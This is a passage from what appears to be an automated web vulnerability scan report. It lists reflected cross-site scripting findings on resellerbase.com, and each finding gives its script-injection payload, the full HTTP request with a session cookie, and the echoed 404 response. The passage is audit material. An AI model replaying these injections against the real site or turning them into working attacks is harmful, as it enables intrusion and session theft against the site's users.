Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dbee3<script>alert(1)</script>666b381f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/search.php?keyword=search...&Submit3=Search&opt=2&dbee3<script>alert(1)</script>666b381f61=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...&Submit3=Search&opt=2&dbee3<script>alert(1)</script>666b381f61=1 was not found on this server.</p>
...[SNIP]...

2.2831. http://www.resellerbase.com/detail/40/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bd022<a>d53d6a33d5c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/search.php?keyword=search...&Submit3=Search&opt=2bd022<a>d53d6a33d5c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...&Submit3=Search&opt=2bd022<a>d53d6a33d5c was not found on this server.</p>
...[SNIP]...

2.2832. http://www.resellerbase.com/detail/40/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2160a<script>alert(1)</script>45618fd8851 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2160a<script>alert(1)</script>45618fd8851/40/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2160a<script>alert(1)</script>45618fd8851/40/themes/ was not found on this server.</p>
...[SNIP]...

2.2833. http://www.resellerbase.com/detail/40/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d292a<script>alert(1)</script>88dcb332bef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40d292a<script>alert(1)</script>88dcb332bef/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40d292a<script>alert(1)</script>88dcb332bef/themes/ was not found on this server.</p>
...[SNIP]...

2.2834. http://www.resellerbase.com/detail/40/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bef25<script>alert(1)</script>829ea1ff336 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesbef25<script>alert(1)</script>829ea1ff336/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesbef25<script>alert(1)</script>829ea1ff336/ was not found on this server.</p>
...[SNIP]...

2.2835. http://www.resellerbase.com/detail/40/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e38b3<script>alert(1)</script>0abc754deb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/?e38b3<script>alert(1)</script>0abc754deb1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/?e38b3<script>alert(1)</script>0abc754deb1=1 was not found on this server.</p>
...[SNIP]...

2.2836. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9c4e<script>alert(1)</script>d53425ae096 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb9c4e<script>alert(1)</script>d53425ae096/40/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb9c4e<script>alert(1)</script>d53425ae096/40/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2837. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dbff5<script>alert(1)</script>2a6b20b2dd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40dbff5<script>alert(1)</script>2a6b20b2dd1/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40dbff5<script>alert(1)</script>2a6b20b2dd1/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2838. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f61e6<script>alert(1)</script>9367a0ab4e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesf61e6<script>alert(1)</script>9367a0ab4e0/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesf61e6<script>alert(1)</script>9367a0ab4e0/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2839. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e36fd<script>alert(1)</script>c0e4877c66d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmose36fd<script>alert(1)</script>c0e4877c66d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmose36fd<script>alert(1)</script>c0e4877c66d/ was not found on this server.</p>
...[SNIP]...

2.2840. http://www.resellerbase.com/detail/40/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20494<script>alert(1)</script>90d99829b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/?20494<script>alert(1)</script>90d99829b0b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/?20494<script>alert(1)</script>90d99829b0b=1 was not found on this server.</p>
...[SNIP]...

2.2841. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ca54<script>alert(1)</script>5b4fe049bf2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9ca54<script>alert(1)</script>5b4fe049bf2/40/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9ca54<script>alert(1)</script>5b4fe049bf2/40/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2842. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c0f1<script>alert(1)</script>0966783d2bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/407c0f1<script>alert(1)</script>0966783d2bb/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/407c0f1<script>alert(1)</script>0966783d2bb/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2843. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8abd6<script>alert(1)</script>38114a82dbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes8abd6<script>alert(1)</script>38114a82dbb/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes8abd6<script>alert(1)</script>38114a82dbb/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2844. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69f9d<script>alert(1)</script>1033a534ec2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos69f9d<script>alert(1)</script>1033a534ec2/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos69f9d<script>alert(1)</script>1033a534ec2/images/ was not found on this server.</p>
...[SNIP]...

2.2845. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4b7ae<script>alert(1)</script>7e47615708a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images4b7ae<script>alert(1)</script>7e47615708a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images4b7ae<script>alert(1)</script>7e47615708a/ was not found on this server.</p>
...[SNIP]...

2.2846. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3af4b<script>alert(1)</script>33b7a75c56a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/?3af4b<script>alert(1)</script>33b7a75c56a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/?3af4b<script>alert(1)</script>33b7a75c56a=1 was not found on this server.</p>
...[SNIP]...

2.2847. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5861a<script>alert(1)</script>ca896c35d5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5861a<script>alert(1)</script>ca896c35d5b/40/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5861a<script>alert(1)</script>ca896c35d5b/40/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2848. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fa59<script>alert(1)</script>527528a0d87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/408fa59<script>alert(1)</script>527528a0d87/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/408fa59<script>alert(1)</script>527528a0d87/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2849. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1b6f<script>alert(1)</script>843cfb38699 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themese1b6f<script>alert(1)</script>843cfb38699/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
